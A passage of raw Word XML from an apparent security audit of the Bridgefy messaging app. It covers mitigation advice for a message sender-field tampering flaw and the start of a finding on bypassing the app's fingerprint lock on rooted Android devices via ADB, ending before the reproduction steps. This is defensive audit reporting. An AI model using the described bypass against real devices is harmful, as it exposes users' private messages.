        </w:rPr>
        <w:t>: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>message.payload.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>senderName</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="32"/>
        <w:ind w:left="4320" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>nickname</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>message.payload.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>senderNickname</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="31"/>
        <w:ind w:left="4320" w:right="363" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>avatar</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-25"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>String</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>(message.payload.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>senderAvatar</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>), isBlocked: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="0086B3"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>false</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="32"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="1511" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="32"/>
        <w:ind w:left="1511" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>if</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>let contact = ContactModel.fetch(withID: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>message.payload.senderId</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="31"/>
        <w:ind w:left="5074" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>in</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>config.context),</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="32"/>
        <w:ind w:left="1907" w:right="5637" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>contact.isBlocked</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-25"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>{ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>return</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="1511" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="66"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="364"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>It is recommended to obtain all sender</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>fields,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>such</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>as</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>senderId</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>from</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>MQTT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>topic instead of MQTT messages. Once this is done, the message structure should</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>eliminate all sender fields from client requests</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>prevent</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>possibility</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>of</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>similar</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>tampering</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>attack vectors in the future. More broadly, the messaging implementation should minimize the number of inputs to reduce the attack surface, and then validate the remaining parameters as strictly as possible. For additional mitigation guidance, please see the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>OWASP Input Validation Cheat Sheet</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>16</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>, and the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>OWASP Insecure Direct Object Reference Prevention Cheat Sheet</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>17</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>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70"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="0" distR="0" allowOverlap="1" layoutInCell="1" locked="0" behindDoc="1" simplePos="0" relativeHeight="487593984">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>914400</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>269459</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1828800" cy="1270"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="23" name="Graphic 23"/>
                <wp:cNvGraphicFramePr>
                  <a:graphicFrameLocks/>
                </wp:cNvGraphicFramePr>
                <a:graphic>
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvPr id="23" name="Graphic 23"/>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21.217285pt;width:144pt;height:.1pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:paragraph;z-index:-15722496;mso-wrap-distance-left:0;mso-wrap-distance-right:0" id="docshape14" coordorigin="1440,424" coordsize="2880,0" path="m1440,424l4320,424e" filled="false" stroked="true" strokeweight=".75pt" strokecolor="#000000">
                <v:path arrowok="t"/>
                <v:stroke dashstyle="solid"/>
                <w10:wrap type="topAndBottom"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="110"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>16</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-13"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId48">
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-2"/>
            <w:sz w:val="20"/>
            <w:u w:val="single" w:color="1154CC"/>
            <w:vertAlign w:val="baseline"/>
          </w:rPr>
          <w:t>https://cheatsheetseries.owasp.org/cheatsheets/Input_Validation_Cheat_Sheet.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>17</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-13"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId49">
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-2"/>
            <w:sz w:val="20"/>
            <w:u w:val="single" w:color="1154CC"/>
            <w:vertAlign w:val="baseline"/>
          </w:rPr>
          <w:t>https://cheatsheetseries.owasp.org/.../Insecure_Direct_Object_Reference_..._Cheat_Sheet.htm</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-2"/>
            <w:sz w:val="20"/>
            <w:vertAlign w:val="baseline"/>
          </w:rPr>
          <w:t>l</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:sectPr>
          <w:pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:header="0" w:footer="1147" w:top="1780" w:bottom="1340" w:left="1440" w:right="1080"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="182"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>BFY-01-015</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>WP1:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>Fingerprint</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>Bypass</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>on</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>Rooted</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>Devices</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>via</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>Crafted</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>Intent</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i/>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i/>
          <w:color w:val="37751C"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Low</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i/>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="56"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="366"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Retest Notes: </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Fix Verified. The Bridgefy team resolved this issue and 7ASecurity verified that the fix is valid. The staging Android 3.0.19 (319) build was found to implement the proposed mitigation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="38"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="364"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>The Android app implements a feature whereby the app locks itself when the user switches to another app. Users are then required to validate their fingerprint,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>in</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>order</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>to access the authenticated portion of the application. It was found</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>that</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>this</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>feature</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>can</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>be trivially bypassed by invoking the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>BridgefyActivity </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>via an ADB command. The impact of this issue is</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>reduced</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>by</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>fact</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>that</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>activity</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>is</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>not</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>exported,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>and</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>hence</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>issue</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>can only be exploited on rooted devices. A malicious attacker, with access to an unlocked rooted device, could leverage this weakness to gain access to all the authenticated screens of the Android app, which reveals all user messages, including direct and broadcast messages, among other information. This issue was confirmed as follows:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="38"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Step</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>1:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Enable</w:t>
      </w:r>
      <w:r>
        <w:rPr>
